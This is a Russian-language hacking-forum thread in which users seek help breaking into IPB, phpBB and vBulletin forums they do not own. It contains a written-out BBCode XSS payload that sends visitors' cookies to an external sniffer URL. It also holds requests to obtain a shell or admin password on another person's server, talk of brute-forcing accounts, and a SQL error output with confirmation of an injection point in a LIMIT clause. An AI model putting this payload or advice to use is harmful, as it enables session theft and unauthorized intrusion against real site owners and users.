Общие вопросы по взлому форумов...

В случае Ipb как узнать версию форума?

 

brlamo, https://forum.antichat.ru/thread11615.html

https://forum.antichat.ru/thread15678.html

 

такой вопрос: если у меня снизу страницы форума написано Powered by PN_phpBB_14 version 1.7.3.2, то какая версия форума? 1,7,3,2 или какая-то другая?

 

это модуль форума к PostNuke, версии 1.7.3.

 

а тут есть оюзор его узявимостей, просто в прикрепленных темах что-то не нашел такого

 

помогите использовать уязвимость в 2.0.20.. чо то я с этим аватарам.. не понимаю как чо делать

 

взлом форума ipb 1.3

скажите правильно, ли я всё зделал

создал тему и в посте написал (без звёздочек) :

Code:

 [em*ail]wj@wj[ur*l=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+docu*ment.cookie);`

А на снифер ни чего неприходит

почему?

 

адрес сниффера http://old.antichat.ru/cgi-bin/s.jpg

 

спс огромное помогло!

еще вопрос: а ,если код поместить в подпись он будет работать?

 

Что можно сделать с Ipb 2.1.7 ? ведь это одна из самых взломостойких версий.. в идеале нужен шелл ) паролей до админки пока нет. ремоут пасс чейнджер (эксплоит на перле что ли ) не работает ( видимо патченный форум . )

 

OMG!!, а если попробовать поискать на milw0rm.com или Securitylab.ru эксплоиты? Какие цели ты преследуешь? Поломать любыми способами? Или утянуть хеш администратора?

 

Ershik, являясь администратором ресурсов в своей сети.. хеш админа на этом форуме у меня есть.. буду надеятся, что он совпадет с админкой на его форуме.. но хеш жесток, и пока его не взломали. Цель - получить доступ к кое-чему на этом сервере. Самое дырявое на том ресурсе - пожалуй сайт на джумле ( проверял все компоненты.. ничего путного нет ) и этот форум.. вот..

 

Я не понял 1)xss(активные и пассивные)
Смотрите значит я пишу просто пост вставляю этот когд потом юзер что должен сделать? нажать на мой пост или нажать на тот код или как? и потом на какой снифер должны прийти кукис? как я с того снифера смогу их достать?

 

hi мне на форуме нужно 200 постов чтоб инфу читать..

мне бы любой акк с 200 месагами..
стоит булка переделанная, брут будет долго... хсс.. чтот не разкрутил..модулей не обнаружил.
короче) вопрос КАК можно чтото сделать?


OMG!!
IPB 2.1.7 remote password changer будет работать только есть debug level = 3
осталась скуля:

и хсс:

 

Знатоки,помогите:

forum/weblogs_news.php?=&order=&start=-20

пишет:

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20, 20' at line 7

SELECT e.entry_id, e.entry_access, e.entry_subject, e.entry_time, e.entry_views, e.entry_poster_id, e.entry_text, e.bbcode_uid, e.entry_mood, e.entry_currently, e.currently_text, e.entry_replies, u.user_id, u.username FROM weblog_entries AS e, users AS u WHERE entry_access <= 0 AND e.entry_poster_id = u.user_id AND e.entry_deleted <> 1 ORDER BY entry_id DESC LIMIT -20, 20

Line : 150
File : weblogs_news.php

здесь можно сделать SQL inj?

 

mash16
иньекция как я понимаю в лимите..

 

как узнать пароль админа на форуме Invision Power Board v1.3.1 Final ?? помогите плиз

 

Люди а не подскажете как можно брутить форумы на phpBB а то у меня акк угнали а я надеюсь вернуть брутом или чем нить другим я лично форум ломать не хочу а только свой акк вернуть
Плизз поделитесь опыцтом в етих делах с чего начать или кратко поясните

 

Товарищи, прошу помочь!

Дано: форум Bulletin® v3.8.0 Release Candidate 1, мой аккаунт с правами юзера.

Необходимо: удалить свой профиль.

Решение: как????

Доп.инфа: облазил всю вкладку Мой кабинет - нет и намека на кнопку "Удалить профиль".

 

Можно как нибудь угнать акк на двиге VBulletin 3.6.6 ???